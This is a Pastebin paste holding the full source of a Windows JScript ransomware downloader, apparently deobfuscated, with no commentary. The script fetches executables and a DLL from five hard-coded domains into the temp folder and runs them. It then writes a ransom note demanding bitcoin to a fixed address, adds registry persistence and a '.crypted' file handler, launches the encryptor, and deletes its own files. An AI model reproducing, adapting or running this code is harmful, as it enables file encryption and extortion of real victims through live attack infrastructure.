Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var id = 'LXD8ChCoeaXvY0jiabUiGD45YojpwUx-mun3rI1oJa-5Ynt8IbxuB7dQ42NDbOSrK4RRYlBr7fA-';
- var ad = '15nUMTVJLKYo27GgWbovLHA8DidAx6jvqm';
- var bc = '0.47531';
- var ld = 0;
- var cq = String.fromCharCode(34);
- var cs = String.fromCharCode(92);
- var ll = [
- 'dicsom.com',
- 'pticemir.ru',
- 'www.trucklogist.ru',
- 'collegembip.com',
- 'retailrzn.ru'
- ];
- var ws = WScript.CreateObject('WScript.Shell');
- var fn = ws.ExpandEnvironmentStrings('%TEMP%') + cs + 'a';
- var pd = ws.ExpandEnvironmentStrings('%TEMP%') + cs + 'php4ts.dll';
- var xo = WScript.CreateObject('Msxml2.XMLHTTP');
- var xa = WScript.CreateObject('ADODB.Stream');
- var fo = WScript.CreateObject('Scripting.FileSystemObject');
- if (!fo.FileExists(fn + '.txt')) {
- for (var n = 1; n <= 5; n++) {
- for (var i = ld; i < ll.length; i++) {
- var dn = 0;
- try {
- xo.open('GET', 'http://' + ll[i] + '/counter/?ad=' + ad + '&id=' + id + '&rnd=' + i + n, false);
- xo.send();
- if (xo.status == 200) {
- xa.open();
- xa.type = 1;
- xa.write(xo.responseBody);
- if (xa.size > 1000) {
- dn = 1;
- if (n <= 2) {
- xa.saveToFile(fn + n + '.exe', 2);
- try {
- ws.Run(fn + n + '.exe', 1, 0);
- } catch (er) {
- util_log('>>> Silencing catch ' + _inspect(er));
- }
- ;
- } else if (n == 3) {
- xa.saveToFile(fn + '.exe', 2);
- } else if (n == 4) {
- xa.saveToFile(pd, 2);
- } else if (n == 5) {
- xa.saveToFile(fn + '.php', 2);
- }
- }
- ;
- xa.close();
- }
- ;
- if (dn == 1) {
- ld = i;
- break;
- }
- ;
- } catch (er) {
- util_log('>>> Silencing catch ' + _inspect(er));
- }
- ;
- }
- ;
- }
- ;
- if (fo.FileExists(fn + '.exe') && fo.FileExists(pd) && fo.FileExists(fn + '.php')) {
- var fp = fo.CreateTextFile(fn + '.txt', true);
- fp.WriteLine('ATTENTION!');
- fp.WriteLine('');
- fp.WriteLine('All your documents, photos, databases and other important personal files');
- fp.WriteLine('were encrypted using strong RSA-1024 algorithm with a unique key.');
- fp.WriteLine('To restore your files you have to pay ' + bc + ' BTC (bitcoins).');
- fp.WriteLine('Please follow this manual:');
- fp.WriteLine('');
- fp.WriteLine('1. Create Bitcoin wallet here:');
- fp.WriteLine('');
- fp.WriteLine(' https://blockchain.info/wallet/new');
- fp.WriteLine('');
- fp.WriteLine('2. Buy ' + bc + ' BTC with cash, using search here:');
- fp.WriteLine('');
- fp.WriteLine(' https://localbitcoins.com/buy_bitcoins');
- fp.WriteLine('');
- fp.WriteLine('3. Send ' + bc + ' BTC to this Bitcoin address:');
- fp.WriteLine('');
- fp.WriteLine(' ' + ad);
- fp.WriteLine('');
- fp.WriteLine('4. Open one of the following links in your browser to download decryptor:');
- fp.WriteLine('');
- for (var i = 0; i < ll.length; i++) {
- fp.WriteLine(' http://' + ll[i] + '/counter/?a=' + ad);
- }
- ;
- fp.WriteLine('');
- fp.WriteLine('5. Run decryptor to restore your files.');
- fp.WriteLine('');
- fp.WriteLine('PLEASE REMEMBER:');
- fp.WriteLine('');
- fp.WriteLine(' - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.');
- fp.WriteLine(' - Nobody can help you except us.');
- fp.WriteLine(' - It`s useless to reinstall Windows, update antivirus software, etc.');
- fp.WriteLine(' - Your files can be decrypted only after you make payment.');
- fp.WriteLine(' - You can find this manual on your desktop (DECRYPT.txt).');
- fp.Close();
- ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCU' + cs + 'SOFTWARE' + cs + 'Microsoft' + cs + 'Windows' + cs + 'CurrentVersion' + cs + 'Run' + cq + ' /V ' + cq + 'Crypted' + cq + ' /t REG_SZ /F /D ' + cq + fn + '.txt' + cq, 0, 0);
- ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCR' + cs + '.crypted' + cq + ' /ve /t REG_SZ /F /D ' + cq + 'Crypted' + cq, 0, 0);
- ws.Run('%COMSPEC% /c REG ADD ' + cq + 'HKCR' + cs + 'Crypted' + cs + 'shell' + cs + 'open' + cs + 'command' + cq + ' /ve /t REG_SZ /F /D ' + cq + 'notepad.exe ' + cs + cq + fn + '.txt' + cs + cq + cq, 0, 0);
- ws.Run('%COMSPEC% /c copy /y ' + cq + fn + '.txt' + cq + ' ' + cq + '%AppData%' + cs + 'Desktop' + cs + 'DECRYPT.txt' + cq, 0, 0);
- ws.Run('%COMSPEC% /c copy /y ' + cq + fn + '.txt' + cq + ' ' + cq + '%UserProfile%' + cs + 'Desktop' + cs + 'DECRYPT.txt' + cq, 0, 0);
- ws.Run('%COMSPEC% /c ' + fn + '.exe ' + cq + fn + '.php' + cq, 0, 1);
- ws.Run('%COMSPEC% /c notepad.exe ' + cq + fn + '.txt' + cq, 0, 0);
- var fp = fo.CreateTextFile(fn + '.php', true);
- for (var i = 0; i < 1000; i++) {
- fp.WriteLine(ad);
- }
- ;
- fp.Close();
- ws.Run('%COMSPEC% /c DEL ' + cq + fn + '.php' + cq, 0, 0);
- ws.Run('%COMSPEC% /c DEL ' + cq + fn + '.exe' + cq, 0, 0);
- ws.Run('%COMSPEC% /c DEL ' + cq + pd + cq, 0, 0);
- }
- ;
- }
- ;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement